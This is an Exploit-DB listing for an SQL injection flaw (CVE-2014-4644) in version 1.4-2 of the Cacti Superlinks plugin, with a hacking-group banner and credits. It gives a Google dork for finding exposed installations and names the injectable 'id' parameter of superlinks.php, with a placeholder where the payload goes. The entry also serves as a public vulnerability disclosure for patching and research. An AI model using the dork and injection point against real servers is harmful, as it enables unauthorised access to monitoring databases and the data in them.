Cacti Superlinks Plugin 1.4-2 - SQL Injection

Author: Napsterakos
type: webapps
platform: php
port: 
date_added: 2014-06-18 
date_updated: 2014-06-21 
verified: 1 
codes: CVE-2014-4644;OSVDB-108452 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png 
application_url: http://www.exploit-db.comsuperlinks-v1.4-2.tgz

 $$$$$$\      $$\   $$\     $$$$$$\
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/

# Exploit Title: Cacti - Superlinks Plugin SQL Injection
# Google Dork: inurl:"/cacti/plugins/superlinks/"
# Date: 18/06/2014
# Exploit Author: Napsterakos
# Software Link: http://docs.cacti.net/plugin:superlinks


Link: http://localhost/cacti/plugins/superlinks/

Exploit: http://localhost/cacti/plugins/superlinks/superlinks.php?id=[SQLi]

Credits to: Greek Hacking Scene